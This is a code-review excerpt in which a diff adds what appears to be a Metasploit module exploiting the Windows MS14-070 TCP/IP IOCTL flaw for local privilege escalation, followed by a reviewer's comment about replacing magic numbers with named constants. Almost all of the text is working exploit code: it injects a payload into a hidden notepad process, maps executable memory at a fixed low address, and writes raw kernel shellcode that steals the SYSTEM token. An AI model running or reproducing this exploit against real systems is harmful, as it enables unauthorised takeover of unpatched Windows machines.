modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

```diff
@@ -0,0 +1,177 @@
+
+    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def create_proc
+    windir = session.sys.config.getenv('windir')
+    cmd = "#{windir}\\System32\\notepad.exe"
+    # run hidden
+    begin
+      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
+    rescue Rex::Post::Meterpreter::RequestError
+      return nil
+    end
+
+    proc.pid
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+    end
+
+    p = payload.encoded
+    new_pid = create_proc
+
+    if new_pid.nil?
+      print_warning('Unable to create a new process.')
+      return
+    end
+
+    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
+    unless execute_shellcode(p, nil, new_pid)
+      fail_with(Failure::Unknown, 'Error while executing the payload')
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
+
+    if not this_proc.memory.writable?(0x1000)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("0x1000 is now writable")
+    end
+
+    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
+
+    sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04"
+    sc << "\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98"
+    sc << "\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8"
+    sc << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
+    sc << [new_pid].pack('V')
+    sc << "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
+    sc << "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA"
+    sc << "\x39\xFF\xA2\xBA"
+    sc << "\xB9\x00\x00\x00\x00"
+    sc << "\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
+
+    this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
+    this_proc.memory.write(0x38, "\x00\x00")
+    this_proc.memory.write(0x1100, buf)
+    this_proc.memory.write(0x2b, "\x00\x00")
+    this_proc.memory.write(0x2000, sc)
```

Comment:
Should any of these magic numbers be constants with more meaningful names? I see that `0x1100` is used a couple of times, so perhaps it'd be better to use a constant for this.